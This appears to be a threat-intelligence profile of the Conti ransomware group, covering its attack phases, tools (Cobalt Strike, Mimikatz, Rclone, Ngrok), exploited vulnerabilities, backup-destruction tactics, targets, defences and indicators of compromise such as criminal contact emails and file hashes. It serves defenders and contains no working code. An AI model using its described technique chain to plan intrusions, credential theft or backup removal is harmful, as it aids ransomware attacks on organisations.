Origin : 2020

Alias : Ransom.Conti

Infection Vectors : Spam emails, Phishing, Spear-phishing, Vulnerability exploitation, Malware distribution networks, Stolen credential, Fake software

Targeted Sectors : Information Technology, Government, Legal Services, Enterprise Services, Real Estate, Healthcare, Education, Transportation, Manufacturing, Electronics, NGOs, and Finance

Targeted Regions : North America, Western Europe, Eastern Europe, Eastern Asia

Motive : Data theft, Financial gains (via Ransom)

Introduction

Active since 2020, the Conti ransomware actors specifically target Microsoft Windows-based systems. The group operates as Ransomware-as-a-Service (RaaS) and is believed to have a Russian-speaking background. As observed, the Conti gang prefers to target organizations that quickly prioritize restoring and using their encrypted data, such as critical and emergency services. A report by Swiss security firm Prodaft revealed that the Conti group collected nearly $25.5 million in ransom over the past five months (as of November 2021). Its operators are known for threatening the non-paying victims by leaking stolen data on their designated data leak site.

Along with honing the skills for the double extortion scheme, the Conti group mastered a methodology to remove backups as well which restricts a victim’s ability to restore the encrypted/stolen data. Thus far, the group remains active.

Infection and Execution

The attack strategies by Conti can be split into a two-phase process.

First Phase - Initial Access

In the first phase of the attack, operators of Conti gain initial access to networks using different techniques. It has been observed leveraging spear-phishing campaigns as well as dropping malicious Word attachments (with scripts that can be used to download or drop other malware such as TrickBot and IcedID). The group often uses Cobalt Strike for lateral movement and further stages of attack with the ultimate goal of deploying Conti ransomware. Moreover, the group makes use of other techniques as well, such as stolen or weak Remote Desktop Protocol (RDP) credentials, phone calls, fake software promoted via search engine optimization, malware distribution networks (e.g., ZLoader), and exploiting common vulnerabilities that exist in external assets.

Second Phase - Execution

In the execution phase, the attackers run a status check (via a getuid payload) before executing a more lethal payload to limit any potential risk of triggering antivirus engines. The CISA and FBI have revealed that Conti actors use the penetration testing tool called RouterScan to scan and brute force routers, cameras, and Network-attached Storage (NAS) devices with web interfaces. Further, the attackers employ Kerberos attacks to get the Admin hash for carrying out the brute force attacks.

For maintaining persistence on victim networks, hackers use genuine remote monitoring and management software and remote desktop software as backdoors. They use already available tools on the victim network, such as Windows Sysinternals and Mimikatz, to collect users’ hashes and clear-text credentials. These credentials enable escalation of privileges within a domain and then carry out other post-exploitation and lateral movement tasks. In some cases, TrickBot is used to perform post-exploitation tasks.

In August 2021, a so-called angry affiliate of Conti leaked a playbook carrying information about the group’s operations. A detailed analysis of this playbook revealed that they attempted to exploit several vulnerabilities in unpatched assets to move laterally and escalate privileges. These flaws include 2017 Windows Server Message Block 1.0 server vulnerabilities, ProxyShell vulnerabilities, PrintNightmare vulnerability (CVE-2021-34527) in Windows Print spooler service, and Zerologon vulnerability (CVE-2020-1472) in Active Directory Domain Controller systems. The artifacts leaked with the playbook revealed four Cobalt Strike server Internet Protocol (IP) addresses used by Conti for communication with their C2 server. It has been observed that Conti uses different Cobalt Strike server IP addresses for different victims.

Besides Windows Sysinternals and Mimikatz, Conti members sometimes used the Rclone tool for data exfiltration. After the actors steal and encrypt the victim’s sensitive data, they use the double extortion technique to demand ransom for the release of the encrypted data and further threaten the victim to publically leak data if the ransom is not paid.

The Targets

According to the FBI, Conti is responsible for more than 400 cyberattacks against organizations around the world, of which 75% are located in the U.S. The group is mostly observed targeting mid to large size enterprises such as Nordic Choice Hotels, Health Service Executive, Kisters AG, Graff, Global Sales Solutions Line, Florida’s Broward County Public Schools (in which hackers demanded a whopping $40 million), and many more. The ransom amounts are based on the size of the organization and its ability to pay. Conti has a reputation of targeting organizations where IT outages can lead to life-threatening situations such as hospitals, emergency medical services, emergency number dispatch carriers, and law enforcement agencies.

**Ninja Technique of Destroying Backups **

In case if the targeted victim has a backup of the data encrypted by Conti and they are capable of restoring the files, Conti has advanced backup-removal expertise. The group brings the ability to hamper backing up data from Veeam, a disaster-recovery firm that specializes in backup software. The group regularly starts its attacks by targeting victims via spam messages and then installing the Cobalt Strike Beacon. It then uses a remote management agent known as Atera or AnyDesk for persistence in a targeted network. The use of Atera allows the attackers to hide the detection of Cobalt Strike from the endpoint detection platforms. Besides Atera, the group sometimes uses a cross-platform application, Ngrok, to create a tunnel to the local host for the exfiltration of data without raising any flags. At last, to make sure that a victim cannot recover the backup data, the attackers lock the victim’s system and then manually remove the Veeam backups that do not leave victims with too many options.

Moreover, the group recruits affiliates that have experience and skills for backup identification, localization, and deactivation.

Preventive Measures

To prevent attacks from Conti, experts suggest frequent employee training and implementation of email security protocols. Organizations are recommended to track externally exposed endpoints to mitigate VPN compromise and TrickBot delivery. It is suggested to implement network-hierarchy protocols to stop the lateral movement inside the network. Moreover, they should regularly audit or block command-line interpreters with the use of whitelisting tools and proper logging of process execution with command-line arguments. This can help in identifying data exfiltration command-line interface activities such as Rclone. Experts also recommend implementing special security protocols, password updates along with account-security actions for Veeam to stop the account takeover of Veeam.

Conclusion

Conti has been active for more than a year and is already considered one of the most dangerous ransomware that has left no option for organizations to recover their data. The group follows the tactic of even destroying backup to bring victim organizations to their knees. Therefore, for a grave threat like Conti, organizations need to up their ante to defend themselves. Moreover, the group is still at large and expected to continue its operations.

Indicators of Compromise

Encrypted Files Extension

.CONTI

Ransom Demand Message

CONTI_README[.]txt

Cyber Criminal Contact

mantiticvi1976@protonmail[.]com

fahydremu1981@protonmail[.]com

frosculandra1975@protonmail[.]com

trafyralhi1988@protonmail[.]com

sanctornopul1986@protonmail[.]com

ringpawslanin1984@protonmail[.]com

liebupneoplan19@protonmail[.]com

stivobemun1979@protonmail[.]com

guifullcharti1970@protonmail[.]com

phrasitliter1981@protonmail[.]com

elsleepamlen1988@protonmail[.]com

southbvilolor1973@protonmail[.]com

glocadboysun1978@protonmail[.]com

carbedispgret1983@protonmail[.]com

listun@protonmail[.]com

mirtum@protonmail[.]com

maxgary777@protonmail[.]com

ranosfinger@protonmail[.]com

bootsdurslecne1976@protonmail[.]com

rinmayturly1972@protonmail[.]com

niggchiphoter1974@protonmail[.]com

lebssickronne1982@protonmail[.]com

daybayriki1970@protonmail[.]com

MD5

196b1e6992650c003f550404f6b1109f

SHA1

6b1213966652f31cc333d9f1db64cb520c2256ec

SHA256

844cc2551f8bbfd505800bd3d135d93064600a55c45894f89f80b81fea3b0fa1

SSDEEP

384:yRcf5+y19sfna80LQiwvoh2fTuMl2t+JCeAxaBtmFU7qFFdjSfwaqkSTepQJb49Q:KcB+hClQ3vTLuMl2toIaCFIvROr

Files Dropped

C:\conti_readme[.]txt

C:\documents and settings\conti_readme[.]txt

C:\far2\addons\colors\conti_readme[.]txt

C:\far2\addons\conti_readme[.]txt

C:\far2\conti_readme[.]txt

D:\conti_readme[.]txt

<REM_DRIVE>:\1189[.]jpeg

<REM_DRIVE>:\1189[.]jpeg[.]conti

<REM_DRIVE>:\1189[.]jpg

<REM_DRIVE>:\1189[.]jpg[.]conti

Processes Created

<PATH_SAMPLE[.]EXE>

%WINDIR%\syswow64\cmd[.]exe

<SYSTEM32>\conhost[.]exe

%WINDIR%\syswow64\vssadmin[.]exe

<SYSTEM32>\vssvc[.]exe